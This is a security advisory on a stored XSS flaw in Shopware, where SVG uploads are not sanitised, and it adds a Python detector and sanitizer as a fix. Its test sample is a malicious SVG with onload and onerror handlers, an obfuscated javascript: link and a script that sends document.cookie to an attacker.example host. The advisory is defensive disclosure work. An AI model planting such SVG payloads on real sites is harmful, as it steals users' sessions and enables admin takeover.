PT-2026-46874 · Packagist · Shopware/Core+1

Published

2026-06-04

·

Updated

2026-06-04

CVSS v3.1

4.9

Medium

Vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
SVG is on the allowed-extensions whitelist, so any admin user can upload an SVG file through the media manager. Nothing in the upload pipeline sanitizes SVG content. A malicious SVG carrying JavaScript (an onload handler on the root element, a <script> element, or HTML wrapped in <foreignObject>) executes in the origin of the Shopware domain when the file is opened in a browser.

The Problem

In src/Core/Framework/Resources/config/packages/shopware.yaml, line 194:
allowed_extensions: ["jpg", "jpeg", "png", "webp", "avif", "gif", "svg", ...]
SVG is whitelisted. The upload path (MediaUploadController → FileSaver → TypeDetector) recognizes SVG as an ImageType with the VECTOR_GRAPHIC flag, but no code strips JavaScript, event handlers, or external entity references from the SVG XML before the file is stored.
A search of the entire codebase for SVG sanitization returns nothing: no DOMPurify, no svg-sanitize, no strip-tags pass over SVG content.

Impact

Stored XSS against every user who opens the uploaded SVG. Note that scripts inside an SVG run only when the file is loaded as a document (direct navigation to the media URL, or embedding via <object>, <embed> or <iframe>); they do not run when the file is referenced from an <img> tag or from CSS. The attacker therefore needs the victim to open the file URL itself, which is served from the Shopware origin, so the script runs with the victim's session. In an e-commerce context this can lead to admin account takeover, customer data theft, or malicious plugin installation.

Suggested Fix

Either:
  1. Remove SVG from allowed_extensions if SVG upload is not a core requirement
  2. Sanitize SVG content on upload using a library like enshrined/svg-sanitize (strips scripts, event handlers, and external references, keeping only allowlisted elements and attributes)
  3. Serve SVGs with Content-Disposition: attachment so the browser downloads the file instead of rendering it as a document (this only affects navigations; subresource loads such as <img> still render)
  4. Serve SVGs from a separate domain (like Nextcloud's usercontent.apps.nextcloud.com), so that any script that does run has no access to the Shopware origin
Option 2 is the most practical: enshrined/svg-sanitize is already used by the WordPress Safe SVG plugin and other PHP projects.
Regards & BG, Keyvan Hardani
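The following is an added example and not code from the report or from Shopware. It shows the two checks the upload pipeline described above is missing: a detector that an upload handler could call to reject a file (reporting the onload handler, <script> and <foreignObject> vectors named in the report, plus remote references and DTD/entity declarations), and an allowlist sanitizer that rewrites the file instead. The allowlists, the function names and the two sample SVGs are this example's own choices; they are not taken from any real upload or from enshrined/svg-sanitize, which takes the same allowlist approach in PHP and would be the natural choice inside Shopware.

```python
"""Allowlist SVG detector and sanitizer (added example, not Shopware code).

Assumptions made by this example (not the project's policy):
  - only the element and attribute names listed below are considered safe;
    anything else, including <script>, <foreignObject>, <style>, <set>,
    <animate> and every on* handler, is dropped together with its subtree;
  - href / xlink:href may only point inside the document ("#id"), so any
    remote reference is dropped;
  - input carrying a DOCTYPE or ENTITY declaration is refused before parsing.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)         # serialise <svg> with a default xmlns
ET.register_namespace("xlink", XLINK_NS)

SAFE_ELEMENTS = {
    "svg", "g", "defs", "symbol", "use", "title", "desc", "a",
    "path", "rect", "circle", "ellipse", "line", "polyline", "polygon",
    "text", "tspan", "linearGradient", "radialGradient", "stop", "clipPath", "mask",
}
SAFE_ATTRS = {
    "id", "class", "x", "y", "width", "height", "viewBox", "preserveAspectRatio",
    "d", "points", "cx", "cy", "r", "rx", "ry", "x1", "y1", "x2", "y2",
    "fill", "fill-opacity", "stroke", "stroke-width", "stroke-linecap",
    "opacity", "transform", "offset", "stop-color", "href",
}
# Elements the detector reports by name; the sanitizer drops them anyway
# because they are absent from SAFE_ELEMENTS.
SCRIPT_ELEMENTS = {"script", "foreignObject", "style", "set", "animate", "handler"}
DTD_RE = re.compile(r"<!(DOCTYPE|ENTITY)", re.IGNORECASE)


def local(name: str) -> str:
    """'{http://www.w3.org/1999/xlink}href' -> 'href'."""
    return name.rsplit("}", 1)[-1]


def is_script_uri(value: str) -> bool:
    # Browsers drop whitespace and control characters before the scheme,
    # so "java<TAB>script:" is still javascript:; normalise before comparing.
    v = re.sub(r"[\s\x00-\x1f]", "", value).lower()
    return v.startswith(("javascript:", "vbscript:", "data:"))


def is_remote_ref(local_name: str, value: str) -> bool:
    return local_name == "href" and not value.strip().startswith("#")


def find_script_surface(raw: str) -> list:
    """What an upload-time check would reject; an empty list means clean."""
    if DTD_RE.search(raw):
        return ["dtd"]           # refuse before the parser expands anything
    findings = []
    for elem in ET.fromstring(raw).iter():       # document order
        tag = local(elem.tag)
        if tag in SCRIPT_ELEMENTS:
            findings.append(f"element:{tag}")
        for name, value in elem.attrib.items():
            lname = local(name)
            if lname.lower().startswith("on"):
                findings.append(f"attribute:{lname}")
            elif is_script_uri(value):
                findings.append(f"uri:{lname}")
            elif is_remote_ref(lname, value):
                findings.append(f"external:{lname}")
    return findings


def _clean(elem: ET.Element) -> None:
    for child in list(elem):
        if local(child.tag) in SAFE_ELEMENTS:
            _clean(child)
        else:
            elem.remove(child)   # subtree goes too (script text, XHTML in foreignObject)
    for name, value in list(elem.attrib.items()):
        lname = local(name)
        if (lname not in SAFE_ATTRS or lname.lower().startswith("on")
                or is_script_uri(value) or is_remote_ref(lname, value)):
            del elem.attrib[name]


def sanitize_svg(raw: str) -> str:
    """Rewrite an SVG so that only allowlisted markup survives."""
    if DTD_RE.search(raw):
        raise ValueError("DOCTYPE/ENTITY declarations are not accepted")
    root = ET.fromstring(raw)
    if local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    _clean(root)
    return ET.tostring(root, encoding="unicode")


# Constructed sample for this example: the three vectors from the report,
# a remote reference and an obfuscated javascript: link. Not a real upload.
MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="alert(document.domain)">
  <script>location='https://attacker.example/?c='+document.cookie</script>
  <rect width="100" height="100" fill="#c00"/>
  <a xlink:href="java&#9;script:alert(1)"><text x="10" y="55">click me</text></a>
  <use xlink:href="https://attacker.example/remote.svg#payload"/>
  <foreignObject width="100" height="100">
    <body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(2)"/></body>
  </foreignObject>
</svg>"""

BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <title>logo</title><circle cx="5" cy="5" r="4" fill="#0a0"/>
</svg>"""

if __name__ == "__main__":
    print(find_script_surface(MALICIOUS_SVG))
    print(sanitize_svg(MALICIOUS_SVG))
```

Rejecting with find_script_surface() is the safer default for a media manager, because a rewritten file may render differently from what the uploader expected; sanitize_svg() is the shape of option 2 above. Whichever is chosen, it has to run on the bytes that are stored, not on the file name or the extension, since the whitelist check that exists today only looks at the latter.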

Fix

XSS

Weakness Enumeration

Related Identifiers

GHSA-XVHC-GM7J-MHMC

Affected Products

Shopware/Core
Shopware/Platform